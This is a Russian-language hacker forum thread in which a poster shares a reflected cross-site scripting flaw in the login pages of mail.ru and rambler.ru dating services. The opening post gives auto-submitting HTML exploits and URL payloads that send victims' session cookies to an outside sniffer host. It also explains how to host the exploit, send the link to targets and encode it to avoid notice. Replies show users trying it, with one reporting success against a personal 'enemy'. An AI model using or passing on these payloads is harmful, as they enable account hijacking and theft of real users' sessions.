Гы гы ... долго же вы ждали темы как ломать эти почтовики =) Старый добрый дядя slider вам расскроет тайну Да.. да... прям возьмём и угоним сессию.. Короче ... дело было вечером .. делать было нечего.. и полез я искать уязвимости на этих почтовиках.. После многих часов поиска (уважайте чужой труд! ) нашол таки... в файле http://love.mail.ru/my/login.phtml скрытую строку: HTML: <input type="hidden" name="tcurl"> Да да... именно она слабое звено!... паразитка такая не фильтруетсо =) вбил я в нее "><script>alert()</script> и вылез заветный алерт!.. А вот тут по сценарию вам надо дать exploit )) С переадрессацией и со всеми наворотами )) А вот он б*я =) майл.ru HTML: <body onload="p.submit()"> <form action="http://love.mail.ru/my/login.phtml" method="post" id="p"> <input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'> рамблер.ru HTML: <body onload="p.submit()"> <form action="http://love.rambler.ru/my/login.phtml" method="post" id="p"> <input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'> СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ? А вот причём... кука прийдёт и от лов и от майла! =) Так что статейка думаю многим пригодистя =) Ну что.. время пошло кто не успел тот опоздал... =) Торопитесь время акции ограничего =) С уважением slider Ахх да... как юзать )) Сохраняете этот "сплойт" в html и качаете на народ.ru далее даёте ссылку комунить на свой "скрипт"... )) Удачи!.. Вот вам ещё скриптеГ =) HTML: http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script> Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!.. HTML: http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3C/script%3E%22!--%3C или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='http://forum.antichat.ru';</script><!--" <a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'http://forum.antichat.ru\'</script><!--"'>ФОрум</a> я конечно не понял точно как сделал слайдер но вот как я сделел
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script> И так можно использовать!!! =) но это как то банально!
Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>? Извените за тупые вопросы просто с XSS плохо разбираюсь.
Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят. Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........
Походу плюсик начал фильтроваться Вернее + просто вырезается, а если пытаешься замаскировать, то отрезается все что идет после плюса.
эх жаль в письме низя"ВНИМАНИЕ! Данное письмо содержит потенциально опасный Html-код, заблокированный автоматической системой безопасности." а то ссылку давать не каждый пойдёт-то...
Все,.. пашет! Спасибо Slider ! Наконец то я достал врага. Сам ты чайник....я просто покурил вчера больше чем надо...
а никто не подскажет какой нить альтернативный сниффер просто я никак не могу завести свой на античате
